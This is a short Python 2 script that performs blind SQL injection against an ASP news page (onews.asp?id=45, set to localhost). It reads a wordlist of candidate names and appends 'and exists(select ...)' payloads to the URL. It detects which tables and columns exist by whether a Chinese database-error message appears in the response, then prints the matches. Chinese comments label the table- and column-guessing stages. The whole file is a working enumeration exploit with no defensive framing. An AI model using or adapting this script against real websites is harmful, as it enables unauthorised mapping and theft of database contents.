#coding:utf-8
import urllib2,re
url = 'http://localhost/onews.asp?id=45'
keywords = '数据库出错'
L = []
class Inject(object):
	def opendict(self):
		with open(r'column.txt','r')as f:
			r = f.readlines()
			for i in r:
				i = i.strip('\n')
				L.append(i)
			f.close()
	def payload(self,name):
		req = urllib2.Request(url+name)
		res = urllib2.urlopen(req)
		page = res.read()
		res.close()
		return page
	def inject(self):
		#开始猜解table_name
		for i in L:
			tablename = "%20and%20exists(select%20*%20from%20" + i + ")"
			match = re.search(keywords.decode('utf-8').encode('gbk'),self.payload(tablename))
			if not match:
			#猜解完成table_name
			#开始猜解column_name
				for n in L:
					columnname = "%20and%20exists(select%20" + n + "%20from%20" + i + ")"
					m = re.search(keywords.decode('utf-8').encode('gbk'),self.payload(columnname))
					if not m:
					#猜解完成column_name
						print "table:",i+"column:",n
if __name__ == '__main__':
	ject = Inject()
	ject.opendict()
	ject.inject()
